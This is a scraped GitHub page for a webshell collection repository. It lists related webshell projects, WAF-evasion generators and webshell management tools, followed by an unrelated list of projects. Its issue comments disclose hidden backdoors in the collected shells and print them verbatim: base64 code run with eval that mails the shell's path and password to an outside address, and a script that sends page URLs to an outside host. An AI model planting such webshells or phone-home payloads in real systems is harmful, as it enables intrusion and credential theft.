Webshell - This is a webshell open source project

Last update: Dec 28, 2022

Related tags

Miscellaneous python php jsp jspx asp webshell aspx pl webshell-sniper

Overview

webshell | English

这是一个webshell收集项目

送人玫瑰，手有余香，如果各位下载了本项目，也请您能提交shell

本项目涵盖各种常用脚本

如：asp,aspx,php,jsp,pl,py

如提交各种webshell，请勿更改名称和密码

注意：所有shell 本人不保证是否有后门，但是自己上传的绝不会故意加后门

各位提交的，也请勿加后门

如发现存在后门代码，请issues 。

本项目提供的工具，禁止从事非法活动，此项目，仅供测试，所造成的一切后果，与本人无关。

在扩展一个项目

webshell-venom

免杀webshell无限生成工具

免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)

Author : yzddmr6

https://github.com/pureqh/webshell

请自行鉴别后门

other webshell project (update 2021-04-03)

xl7dev/WebShell

JohnTroony/php-webshells

BlackArch/webshells

LandGrey/webshell-detect-bypass

JoyChou93/webshell

bartblaze/PHP-backdoors

WangYihang/Webshell-Sniper

threedr3am/JSP-Webshells

DeEpinGh0st/PHP-bypass-collection

lcatro/PHP-WebShell-Bypass-WAF

ysrc/webshell-sample

tanjiti/webshellSample

webshellpub/awsome-webshell

tdifg/WebShell

malwares/WebShell

lhlsec/webshell

oneoneplus/webshell

vnhacker1337/Webshell

backlion/webshell

twepl/wso wso for php8

顺便在推一波网站管理工具

中国菜刀

Cknife

Altman

xise

Weevely

quasibot

Webshell-Sniper

蚁剑 antSword

冰蝎 Behinder

webacoo

哥斯拉 Godzilla

PhpSploit

以上排名不分先后

Author ：tennc

http://tennc.github.io/webshell

license : MIT

Download link

Check github releases. Latest:

https://github.com/tennc/webshell/releases

Thank you to JetBrains for providing an OSS development license for their products

Comments

Hidden Backdoor

in Line 75 you can see this code $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); when i decode it i see mail() function to send (path ,password ,visitor ip) to this email [email protected] @mail("[email protected]",$judul,$body,$auth_pass);

opened by dev0root 12

/php/404.php.txt 存在后门

$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff));

解码过后

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.6 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  **if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);

opened by burnegg 5

Have a hiden native backdoor log

In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\"> send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.

Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>

The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);

This send the referer site to other persons.

This shell is dirty.

opened by yhojann-cl 2
webshell readme更新请求

谢谢提供webshell的收集。

我fork了你的webshell，但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。我看到你的readme写到：“所有shell 本人不保证是否有后门，但是自己上传的绝不会故意加后门” 可否在你的readme中加上你自己确认没有病毒的shell的文件列表，这样我可以少检查很多shells :）

opened by Izib 2
Add a security policy

Hey there!

I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

opened by benharvie 1
Reame: translate to english

I used mainly Google translate, so I could have gotten some things wrong, please use this as a first stept to translate your Readme into english.

you could leave the original as Readme_zn.md if you like

opened by rubo77 1
PHP7: undefined functions set_magic_quotes_runtime() and ereg()

If you try to run this file on a newer webserver:

webshell/web-malware-collection-13-06-2012/PHP/c99.txt

You get lots of php errors

could you update the shell to php7 pls?

opened by rubo77 1
Need mysql shell-client for JSP

Hi guys! First off, thanks for your page. I'm looking mysql shell-client for jsp. (I just want browse tables,columns) I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?

opened by shadowzoom 1
r57 shell contains phone home backdoors

webshell/138shell/R/r57 Shell.php.txt

https://github.com/tennc/webshell/blob/master/138shell/R/r57%20Shell.php.txt#L1025

https://github.com/tennc/webshell/blob/master/138shell/R/r57%20Shell.php.txt#L1037

opened by Varbaek 1
webshell/php/非常规的pHp一句话木马.php

这个代码有问题呀，next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in 我的测试环境是PHP5.6.8

opened by ning1022 1

Releases(v-2021-01-05)

v-2021-01-05(Jan 5, 2021)

first 2021 version add some webshell add some contents
Source code(tar.gz)
Source code(zip)
2020-08-18(Aug 18, 2020)

add some shell
Source code(tar.gz)
Source code(zip)
2020-04-04(Apr 4, 2020)

Source code(tar.gz)
Source code(zip)
v-2017-04-19(Apr 19, 2017)

Source code(tar.gz)
Source code(zip)
v-2016-03-05(Mar 5, 2016)

Source code(tar.gz)
Source code(zip)
v-2015-07-20(Jul 20, 2015)

Source code(tar.gz)
Source code(zip)
v-2015-03-04(Mar 17, 2015)

Source code(tar.gz)
Source code(zip)

Owner

GitHub http://tennc.github.io

Camdram is an open source project developed by a team of volunteers for the benefit of the Cambridge student theatre community

Camdram is an open source project developed by a team of volunteers for the benefit of the Cambridge student theatre community. We use this repository to host the code that runs Camdram and to co-ordinate our work, however we welcome anyone to contribute bugs and suggest new features.

19 Jun 26, 2022

It is an open-source and free project, which is faced with the drawing lovers, providing a free and simple Gallery service

5 Dec 15, 2022

Orangescrum is a simple yet powerful free and open source project management software that helps team to organize their tasks, projects and deliver more.

Free, open source Project Management software Introduction Orangescrum is the simple yet powerful free and open source project management software tha

110 Dec 30, 2022

Nova Search is an open source search engine developed by the Artado Project.

Loli Search Loli Search açık kaynak kodlu bir arama motorudur ve yalnızca kendi sonuçlarını değil, diğer arama motorlarının sonuçlarını da göstermekte

10 Jul 22, 2022

Plant Watering Sensor Project for Zigbee Network (based on the Source Code of the DIYRUZ Flower Project - https://github.com/diyruz/flower).

Plant-Watering-Sensor-Zigbee Plant Watering Sensor Project for Zigbee Network (based on the Source Code of the DIYRUZ Flower Project

80 Dec 22, 2022

Roach-example-project - Example project to demonstrate how to use RoachPHP in a Laravel project.

Example repository to illustrate how to use roach-php/laravel in a Laravel app. Check app/Spiders/FussballdatenSpider.php for an example spider that c

11 Dec 15, 2022

A beautiful, fully open-source, tunneling service - written in pure PHP

Expose A completely open-source ngrok alternative - written in pure PHP. Documentation For installation instructions, in-depth usage and deployment de

3.9k Jan 7, 2023

Nuber is an open source container management platform it provides a front end to manage your own cloud infrastructure, using Linux Containers virtualization technology

33 Dec 14, 2022

MajorDoMo is an open-source DIY smarthome automation platform aimed to be used in multi-protocol and multi-services environment.

MajorDoMo (Major Domestic Module) is an open-source DIY smarthome automation platform aimed to be used in multi-protocol and multi-services environment. It is based on web-technologies stack and ready to be delivered to any modern device. It is very flexible in configuration with OOP paradigm used to set up automation rules and scripts. This platform can be installed on almost any personal computer running Windows or Linux OS.

369 Dec 30, 2022

SuiteCRM is the award-winning open-source, enterprise-ready Customer Relationship Management (CRM) software application.

111 Dec 21, 2022

Open-source library used in Gigadrive projects with common PHP utilities

PHP Commons This library provides PHP utilities used in Gigadrive projects, provided for the open-source community. Functions are registered globally

3 Nov 10, 2021

🚀 An open source multiplayer space strategy game.

Badges Introduction The game story takes place in a virtual galaxy where randomly generated planets produce various raw materials which can be used by

192 Dec 25, 2022

A collection of open source projects built using Laravel.

Open Laravel A repository of open source projects built using Laravel. Getting Started Clone the project repository by running the command below if yo

111 Dec 12, 2022

Wajex Finans'ın Open-Source versiyonunun tanıtımı

Merhaba ?? Wajex Finans projesine hoş geldiniz. Bu projenin 2 kısmı var, biri open-source kısmı bunu isteyen herkes kullanabilecek, ikinci kısmı ise d

6 Dec 5, 2022

An open source Minecraft server (true-og.net)

true-og An open source Minecraft server (true-og.net) Website forked from aviel900 https://www.spigotmc.org/resources/minecraft-one-page-template.5973

0 Nov 28, 2022

Apache OpenWhisk is an open source serverless cloud platform

OpenWhisk OpenWhisk is a serverless functions platform for building cloud applications. OpenWhisk offers a rich programming model for creating serverl

5.9k Jan 8, 2023

Private, self-hosted Composer/Satis repository with unlimited private and open-source packages and support for Git, Mercurial, and Subversion.

Private, self-hosted Composer/Satis repository with unlimited private and open-source packages and support for Git, Mercurial, and Subversion. HTTP API, HTTPs support, webhook handler, scheduled builds, Slack and HipChat integration.

112 Nov 24, 2022

An open source tool that lets you create a SaaS website from docker images in 10 minutes.

简体中文 Screenshots for members ( who subscribe the plan ) for admin ⚠️ This document was translated into English by deepl and can be improved by PR An o

669 Jan 5, 2023

Repository for the last open source version of Booked Scheduler.

Welcome to Booked Scheduler This is a community effort to keep the OpenSource GPLv3 BookedScheduler alive, see History Prerequisites PHP 7.0 or greate

259 Jan 5, 2023